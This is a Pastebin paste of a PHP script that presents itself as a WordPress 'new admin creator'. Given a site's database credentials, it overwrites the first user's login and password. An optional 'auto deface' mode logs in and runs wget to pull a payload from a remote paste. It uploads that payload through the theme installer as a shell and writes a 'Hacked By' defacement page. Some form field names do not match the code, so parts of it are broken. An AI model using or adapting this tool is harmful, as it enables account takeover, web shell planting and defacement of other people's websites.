API tools faq
paste
Advertisement
Guest User

Darkfeyz Wordpress Admin Oluşturucu

a guest
Apr 15th, 2016
249
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.49 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. if($_POST){
  4. $host = $_POST['host'];
  5. $username = $_POST['username'];
  6. $password = $_POST['password'];
  7. $db = $_POST['db'];
  8. $dbprefix = $_POST['dbprefix'];
  9. $user_baru = $_POST['user_baru'];
  10. $password_baru = $_POST['password_baru'];
  11. $prefix = $db.".".$dbprefix."users";
  12. $sue = $db.".".$dbprefix."options";
  13. $tanya = $_POST['tanya'];
  14. $target = $_POST['target'];
  15. $nick = $_POST['nick'];
  16. $pass = md5("$password_baru");
  17.  
  18.  
  19. mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
  20. mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
  21.  
  22. $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  23. $r=mysql_fetch_array($tampil);
  24. $id = $r[ID];
  25.  
  26. $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  27. $r2=mysql_fetch_array($tampil2);
  28. $target = $r2[option_value];
  29. echo "# $target<br>";
  30.  
  31.  
  32. mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  33.  
  34.  
  35.  
  36.  
  37. if($tanya=="y"){
  38.  
  39. function ambilKata($param, $kata1, $kata2){
  40. if(strpos($param, $kata1) === FALSE) return FALSE;
  41. if(strpos($param, $kata2) === FALSE) return FALSE;
  42. $start = strpos($param, $kata1) + strlen($kata1);
  43. $end = strpos($param, $kata2, $start);
  44. $return = substr($param, $start, $end - $start);
  45. return $return;
  46. }
  47.  
  48. function anucurl($sites){
  49. $ch1 = curl_init ("$sites");
  50. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  53. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  54. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  55. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  56. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  57. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  58. $data = curl_exec ($ch1);
  59. return $data;
  60. }
  61.  
  62. function lohgin($cek, $web, $userr, $pass){
  63. $post = array(
  64. "log" => "$userr",
  65. "pwd" => "$pass",
  66. "rememberme" => "forever",
  67. "wp-submit" => "Log In",
  68. "redirect_to" => "$web/wp-admin/",
  69. "testcookie" => "1",
  70. );
  71. $ch = curl_init ("$cek");
  72. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  73. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  74. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  75. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  76. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  77. curl_setopt ($ch, CURLOPT_POST, 1);
  78. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  79. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  80. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  81. $data6 = curl_exec ($ch);
  82. return $data6;
  83. }
  84.  
  85. $site= "$target/wp-login.php";
  86. $site2= "$target/wp-admin/theme-install.php?upload";
  87. $a = lohgin($site, $target, $user_baru, $password_baru);
  88. $b = lohgin($site2, $target, $user_baru, $password_baru);
  89.  
  90.  
  91. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  92. echo "# token -> $anu2<br>";
  93.  
  94.  
  95. system('wget http://pastebin.com/raw.php?i=mEQP6prW');
  96. system('cp raw.php?i=mEQP6prW m.php');
  97.  
  98. $post2 = array(
  99. "_wpnonce" => "$anu2",
  100. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  101. "themezip" => "@m.php",
  102. "install-theme-submit" => "Install Now",
  103. );
  104. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  105. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  106. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  107. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  108. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  109. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  110. curl_setopt ($ch, CURLOPT_POST, 1);
  111. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  112. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  113. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  114. $data3 = curl_exec ($ch);
  115.  
  116. $namafile = "wew.php";
  117. $fp2 = fopen($namafile,"w");
  118. fputs($fp2,$nick);
  119.  
  120. $y = date("Y");
  121. $m = date("m");
  122.  
  123.  
  124. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  125. curl_setopt($ch6, CURLOPT_POST, true);
  126. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  127. array('file3'=>"@$namafile"));
  128. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  129. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  130. $postResult = curl_exec($ch6);
  131. curl_close($ch6);
  132.  
  133. $as = "$target/k.php";
  134. $bs = file_get_contents($as);
  135. if(preg_match("#hacked#si",$bs)){
  136. echo "# <font color='green'>Basarılı...</font><br>";
  137. echo "# $target/k.php<br>";
  138. }
  139. else{
  140. echo "# <font color='red'>Basarısız...</font><br>";
  141. echo "# Manuel Deneyin: <br>";
  142. echo "# $target/wp-login.php<br>";
  143. echo "# admin: $user_baru<br>";
  144. echo "# sifre: $password_baru<br>";
  145.  
  146.  
  147. }
  148.  
  149.  
  150.  
  151.  
  152. }
  153.  
  154. elseif($tanya=="n"){
  155. echo "# Basarılı<br>";
  156. echo "# KullanıcıAdı: $user_baru<br>";
  157. echo "# Sifre: $password_baru<br>";
  158. }
  159.  
  160.  
  161.  
  162. }else{
  163. echo '<html>
  164. <head>
  165. <title>Wordpress Yeni Admin Oluşturucu</title>
  166. </head>
  167.  
  168. <body>
  169. <center>
  170. <center><div id="button"></div>
  171. <h2>Wordpress Yeni Admin Oluşturucu</h2>
  172. <table>
  173. <tr><td><form method="post" action="?action"></td></tr>
  174. <tr><td><input type="text" name="Localhost" placeholder="localhost"></td></tr>
  175. <tr><td><input type="text" name="username" placeholder="DB Kullanıcı Adı"></td></tr>
  176. <tr><td><input type="text" name="password" placeholder="DB Şifre"></td></tr>
  177. <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  178. <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  179. <tr><td><input type="text" name="user_baru" placeholder="Yeni Kullanıcı Adı"></td></tr>
  180. <tr><td><input type="text" name="password_baru" placeholder="Yeni Şifre"></td></tr>
  181. <tr><td>Oto Deface<input type="radio" name="tanya" value="evet"> y <input type="radio" name="tanya" value="hayır"> n</td></tr>
  182.  
  183. <tr><td><input type="text" name="nick" placeholder="Hacked By Darkfeyz"></td></tr>
  184. <tr><td><input type="submit" value="Değiştir"></td></tr>
  185. </table>
  186. Kodlardaki hacked by darkfeyz yerini kendi nickinizle değiştirmeyi unutmayında
  187. </center>
  188. </body>';
  189. }
  190.  
  191. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!